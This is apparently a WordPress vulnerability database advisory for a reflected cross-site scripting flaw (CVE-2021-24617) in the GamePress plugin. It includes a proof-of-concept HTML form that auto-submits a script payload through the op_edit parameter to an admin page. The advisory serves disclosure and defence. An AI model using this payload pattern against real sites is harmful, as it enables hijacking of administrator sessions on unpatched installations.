logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

GamePress <= 1.1.0 - Reflected Cross-Site Scripting

Description

The plugin does not escape the op_edit POST parameter before outputting it back in multiple Game Option pages, leading to Reflected Cross-Site Scripting issues

Proof of Concept

Affected pages: op=engines, op=perspectives, op=modes, op=genres, op=themes, op=platforms

<form action="https://example.com/wp-admin/admin.php?page=gp-ops&op=modes&id=test" method="post" name="test">
   <input type="text" name="op_edit" value="<script>alert('xss')</script>">
<button type="submit"></button>
</form>
<script>
document.test.submit();
</script>

Affects Plugins

gamepress

No known fix - plugin closed

References

CVE

CVE-2021-24617

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Original Researcher

Neppah

Submitter

Neppah

Verified

Yes

WPVDB ID

3e262cd7-ca64-4190-8d8c-38b07bbe63e0

Timeline

Publicly Published

2021-09-20 (about 4 months ago)

Added

2021-09-20 (about 4 months ago)

Last Updated

2021-09-20 (about 4 months ago)

Our Other Services

WPScan WordPress Security Plugin